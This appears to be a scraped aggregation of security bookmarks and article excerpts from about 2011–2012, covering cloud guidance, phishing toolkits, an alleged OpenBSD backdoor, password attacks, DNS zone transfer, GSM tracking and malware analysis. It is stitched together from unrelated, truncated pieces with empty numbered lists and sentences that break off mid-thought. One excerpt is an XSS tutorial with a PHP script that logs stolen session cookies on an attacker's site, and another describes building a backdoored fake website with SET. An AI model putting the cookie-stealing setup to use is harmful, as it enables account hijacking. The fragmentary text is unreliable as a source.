NIST Issues Public Cloud Computing Guidance. SP 800-144: Guidelines on Security and Privacy in Public Cloud Users - not providers - have ultimate responsibility for the security and privacy of data stored on the public cloud, new guidance from the National Institute of Standards and Technology says. Guidance coauthor and NIST Computer Scientist Tim Grance says public cloud computing is a viable choice for many applications and services for enterprises to consider.
"However," Grance says, "accountability for security and privacy in public cloud deployments cannot be delegated to a cloud provider and remains an obligation for the organization to fulfill. " NIST Special Publication 800-144: Guidelines on Security and Privacy in Public Cloud Computing provides an overview of the security and privacy challenges facing public cloud computing. It presents recommendations that organizations should consider when outsourcing data, applications and infrastructure to a public cloud. SP Toolkit - Open Source Phishing Education Toolkit. SP Toolkit - Open Source Phishing Education Toolkit A new open source toolkit makes it ridiculously simple to set up phishing Web sites and lures. The software was designed to help companies test the phishing awareness of their employees, but as with most security tools, this one could be abused by miscreants to launch malicious attacks. The spt project is an open source phishing education toolkit that aims to help in securing the mind as opposed to securing computers.
Organizations spend billions of dollars annually in an effort to safeguard information systems, but spend little to nothing on the under trained and susceptible minds that operate these systems, thus rendering most technical protections instantly ineffective. A simple, targeted link is all it takes to bypass the most advanced security protections. FBI OpenBSD Backdoors and RSA Cipher Vulnerability. 12 January 2012 FBI OpenBSD Backdoors and RSA Cipher Vulnerability Previous: From: Gregory Perry <Gregory.Perry[at]govirtual.tv> Subject: Follow up to OpenBSD Crypto Framework Backdoors Thread Date: Thu, 12 Jan 2012 01:57:39 +0000 Here is a follow up to the FBI / OpenBSD / OCF encryption backdoors thread as promised. We had a three alarm fire at our house over the Christmas holidays and I am just now getting plugged back in. 1) At ~1997 or thereabouts, the FBI approached a fellow by the name of Lew Jenkins, the Chairman and CEO of Premenos Technology Corp., about their development of an Electronic Data Interchange (EDI) software suite used for corp-to-corp EDI transactions called "Templar". 3) A portion of Mr. 4) One of the investors in Premenos was a fellow by the name of Ross Pirasteh, who was either the Prime Minister of Finance for the Shah of Iran or actually the Shah of Iran himself.
Gregory Perry. #Dev Auth - MS-CHAP v2 MS-CHAPv2. Passwords can be broken in real-time (active) and offline (passive) modes. The premise of a dictionary attack is that by trying every possible combination or words (or tokens), an attacker ultimately will succeed in discovering user secret passwords. A dictionary attack relies on the fact that d. password is often a common word, name, or concatenation of words or names with a minor modification such as a trailing digit or two, Longer passwords with a variety of characters (such as ^Y2o4uEA16r3-2e64A12EFing!) Offer the greatest protection against dictionary attacks. During an online dictionary attack, an attacker tries to actively gain network access by trying many possible combinations of passwords for a specific user. Online dic-tionary attacks can be prevented using password lockout mechanisms that lock out the user account after a certain number of invalid login attempts. Backtrack 5 Penetration Testing with Social.
Backtrack 5: Penetration Testing with Social Engineering Toolkit. Social engineering attacks are one of the top techniques used against networks today. Why spend days, weeks or even months trying to penetrate layers of network security when you can just trick a user into running a file that allows you full access to their machine and bypasses anti-virus, firewalls and many intrusion detection systems? This is most commonly used in phishing attacks today - craft an e-mail, or create a fake website that tricks users into running a malicious file that creates a backdoor into their system. But as a security expert, how could you test this against your network? Would such an attack work, and how could you defend against it? (click image to enlarge) The Backtrack Linux penetration testing platform includes one of the most popular social engineering attack toolkits available. We will use SET to create a fake website that offers a backdoored program to any system that connects. 1. 2. 3. 4. 5. 6. 7. 8. 9. 10.
Now Backtrack is all set and does several things. Untitled. So Many Security Standards, Audits, and Certifications. Which One is Right?! Last week I had a great conversation with a prominent member of the information security community (@HackSec), and he raised the following concern: Many are confused about when to use ISO 27001 certification, PCI certification, SOC 1 (aka SSAE16), SOC 2 & 3, NIST, and CSA STAR to give customers comfort about their security.
I explained my position that I think organizations should use SOC2 as an umbrella for all of them especially because many service organizations are required by their customers to comply with multiple standards and produce multiple reports. To this, he expressed his frustration that if the information security community cannot decide which one to standardize on, how can customers be expected to know what to do? He said: "We'll stay in this nexus of confusion where every attestation is required, and yet customers still do not have confidence in our security and demand the right to audit. " Untitled. Enterprises with trust issues - separation of duties for system administrators This article caught my attention recently... "Laid-off IT worker accused of hacking, crashing Missoula company's servers", and made me think of a company I worked with around the time of the dot-com bubble burst where we figured out this very issue... almost a decade ago. Trust is a difficult thing to work out in any size organization as it is as much a human nature problem as it is a technical control...
I've been talking a lot lately about trusting your systems, and your software ...but what about your people? More important perhaps than anything else an organization must trust its administrators. Those that run the critical systems, manage the authentication and authorization of users and systems, and overall have the keys to the kingdom often shouldn't be blindly trusted... yet that's exactly what we do. The "trust no one" camp Some people believe that in trust there is one absolute - you trust no one.
SSLSmart: Perform Smart SSL Cipher Enumeration. Unbetitelt, Malware Analysis: How to Decode JavaScript. Untitled. Network Configuration Builders » Nessus Parser v15. Okie Grabbing using XSS ~ Sudhir @ Pentester. XSS means Cross-site Scripting is a type of computer security vulnerability typically found in Web applications that enables attackers to inject client-side script into Web pages viewed by other users. There are two types of XSS : Non-Persistent and Persistent. If u need to know about persistent and non-persistent click here . Now .. Search for vulnerability in a site: its on you This is a simple example here: <sript>alert(“hi”);</script> Make sure that you have a site where the cookie needs to be uploded.. (Where a link has to be sent and script executes ) Upload the below php script in your site ex:1.php <?
$cookie=$_GET[‘cookie’]; //storing cookies in a variable called $cookie. $file=fopen(“cookies.txt”,”a”); //opening a file called cookies.txt with append mode. fwrite($file,$cookie.” fclose($file); Save it as “ 1.php “ Now the url looks like : www.your_site.com/some_folder/1.php Find vuln in a site then put it like this below : So u need to mask it Ex: ZoneTransfer.me. When teaching, and when talking to clients, I sometimes have to explain the security problems related to DNS zone transfer.
The problem usually comes when trying to demonstrate how it works and what information can be leaked, trying to remember which domains have zone transfer enabled and then hoping that they still have it turned on can make it hard. So, to ease both of these problems I've registered zonetransfer.me, a domain which is easy to remember and which will always have zone transfer enabled. So, the domain is zonetransfer.me and the two name servers are ns12.zoneedit.com and ns16.zoneedit.com.
Feel free to use this domain in your training and when talking to clients, hopefully it will help educate people as to why it should be disabled in almost all cases on public DNS servers. To help with the education here is what I've set up and how I would read it. First the full output from a transfer using dig: The information starts with the SOA record: The name servers for this domain. Sqlmap: automatic SQL injection and database takeover tool. 440,783 "Silent SMS" Used to Track German Suspects in 2010.
Initial press reports focused on Nohl's revelation that hackers can potentially sniff numerous phone IDs and network authentications from an advantageous point, and because network authentications aren't frequently refreshed (depending on the network operator), an attacker could make expensive premium rate calls and bill them to other persons. GSM network specifications allow for every network action to be re-authenticated, but that requires serious investment in authentication servers. So operators may only do it every third call. Or tenth. Or perhaps only when the phone connects to the network. The H Security has a good summary overview of all the topics covered during the presentation.
But one of the most interesting things, from our point of view, was Nohl's brief reference to recent reports (Dec. 13th) about various German police authorities having used nearly half a million "Silent SMS" to track suspects in 2010. We followed the referenced link to this Heise Online article. Untitled. NSA Operating Systems Security Configuration Guides. Top 10 Celebrities Not To Google If You Don't Want A Computer Virus | Epicenter. Hunting%20malware%20with%20Volatility%20v2.0. Corkami - reverse engineering experiments and documentations. No more Wine - NetworkMiner in Linux with Mono. Monday, 26 December 2011 20:30:00 (UTC/GMT) NetworkMiner is a network forensics tool that is primarily designed to run under Windows. But it is now (as of version 1.2 of NetworkMiner) also possible to run NetworkMiner on non-Windows OS's like Linux, Mac, FreeBSD etc. with help of Mono.
This means that there is no longer any need to run NetworkMiner under Wine, since Mono is a much better alternative. So what is Mono? Here is a description from the mono-project's website: “Mono is a software platform designed to allow developers to easily create cross platform applications. (emphasis added) Here are some of the features in NetworkMiner that work better under Mono compared to Wine: Here are the commands required to install Mono and NetworkMiner on Ubuntu Linux: The reason for setting write permission to the AssembledFiles folder is because this is the directory to where extracted files are written. Share | Short URL: CAST Slides: Hunting malware with Volatility v2.0 | Offensive Computing. About Anonymous, Donations and Charities. STRATFOR is an organization that gathers open source intelligence for forecasting purposes. Their publications are sold via stratfor.com.
As far as we can tell, Anonymous gained access to a subscriber list stored on stratfor.com, and that list contained unencrypted credit card data. Anonymous has now published three lists of credit card details belonging to people who have subscribed to STRATFOR reports. The lists contained 3956, 13191 and 30726 card details, respectively. These card details belong to subscribers all over the world. After the credit card leaks, various members of Anonymous have published screenshots where these credit cards have been used to make sizable donations to various charities. At the first glance, actions like this look a bit like the actions of Robin Hood — steal from the rich, give to the poor. But unfortunately, in this case the poor won't get a dime. These anonymous donations will never reach the ones in need. Merry Christmas. Encryption and Traveling: EFF's Tips Regarding Data Security And Cross-Border Travel - AlertBoot Endpoint Security. How to search for backdoor PHP shell scripts on a hacked server.
SIM Toolkit Attack | Mobile Security. Posted by m-sec.net on November 17th, 2011 Hi all, I must say it was a real pleasure to attend the DeepSec 2011 edition. I’ve met a lot of interesting people and all the talks were great. Since it was my first time I held an international talk with such large audience, I was a little bit excited, but no matter what, I still consider I did a pretty good job. By now I only got positive feedback To answer some of the frequently asked questions: 1. 2. 3. 4. 5. 6. 7.
I was happy that right after the talk I’ve been contacted by RIM in order to send them the details to fix this. Thank you Lynx, MiKa, Manuela for this opportunity! I also hope that next year there will be more people from Romania in the audience. Below it’s a recording of my talk SMS fuzzing, SIM Toolkit Attack – I hope you’ll ignore my excitement The slides from the talk can be found here (click me). I wait for your feedback! You can leave a response, or trackback from your own site. Highly critical zero day vulnerability in Windows discovered. Videos. Generation InsecuritY - Is the Internet a Fundamental Necessity? Gaining unauthorized Internet access and hiding your tracks have become common skills for a whole generation that feels information and communication should be free, even at work.
Cisco recently released its 2011 Connected World Technology Report which surveyed the world’s next generation workforce, and included the views of approximately 3,000 college students and young professionals in response to the following two questions: Is the Internet a fundamental human necessity? Is a workplace with flexible mobility policies as valuable as salary? The findings were striking, and give a unique glimpse into the techno-savvy and media-saturated mind-set held by our younger generation, who have no recollection or collective memory of a world not ubiquitous with mobile communications and the Internet, and see these as a natural human right. We need to take note, because of how these attitudes translate to action in the real world.
Previous Columns by Oliver Rochford: [openwall-announce] John the Ripper 1.7.9-jumbo-5; 1.7.9 for Windows r. Malware tracker: pdf examiner. Exercise Tested NATO Procedures for Cyber Defense. From December 13th to 15th NATO conducted a cyber defense exercise in order to test technical and operational Alliance cyber defense capabilities. The exercise called Cyber Coalition 2011 was an opportunity to test Alliance working procedures for responding to large scale cyber attacks targeting information infra-structures of NATO and individual countries.
The exercise was based on a fictitious crisis in which all participant nations had to deal with simulated cyber attacks. The scenario of the exercise required action, coordination and collaboration from cyber defense specialists and management bodies. A total of 23 NATO and six partner nations nations were involved in the exercise. “The number of players and observers is growing every year. Around 100 specialists took part in the exercise from locations in the Alliance’s SHAPE Headquarters in Mons and the NATO Headquarters in Brussels. More on the Captured U.S. Drone. Patch Tuesday December 2011. Oxid.it - Home. Hacking IPv6 III – IPv6 Spoofing in 6in4 tunnels « iniqua. FBI acknowledges more SCADA attacks, increases cyber budget. Adobe Zero-Day Attack Part Of Wider Campaign. Walking Toe to Toe With Shylock « P4r4n0id Reversing Lab.
REVERSING RORPIAN – DHCP Hijacking Malware | InfoSec Institute – IT Training and Information Security Resources. Plagiarism in IT Security - Walking a Fine Line. Network Security in the Age of Social Media. Anonymous and AntiSec: Mixing Metaphors Can Lead to Trouble. Buster Sandbox Analyzer. GCHQ code-breaking challenge cracked by Google search. DOM Snitch version 0.734. Defeat dreaded pass-the-hash attacks | Security. The Spy Files: Wikileaks expose Mobile Phone, Email Hacking capability ~ The Hacker News | Hacking News | Learn Ethical Hacking Training. Redline 1.1 Released. Investing in the correct log management tool can ensure that the pressures of maintaining enterprise system log data are greatly decreased. Although the right tool is very helpful, the possibility of it turning into the wrong tool can happen in the blink. CVE-2011-3544 Java Applet Rhino Script Engine Metasploit Demo. New Java Attack Rolled Into Exploit Kits. Exploit Development Basics.
Framework - /modules/auxiliary/scanner/http/owa_login.rb - Metasploit Redmine Interface. [openwall-announce] John the Ripper 1.7.9. A Shot Across the Bow: Five Lessons from the Start of the SCADA Attack Era. Security Checklist: 10 Ways to Avoid Data Loss. Phone hacking, and the art of asking a good question | John Cooper. Cyber Terror. [C++] ISC BIND 9.8.1 P1 diff DoS. Com Botnet Timemap. Hook Analyser 1.3. Financial Group. Fgont-h2hc2011-ipv6-security. Preparing The Next Release of REMnux Distro.
Confronting 3 IT Security Challenges. Blackbuntu | Download blackbuntu software for free.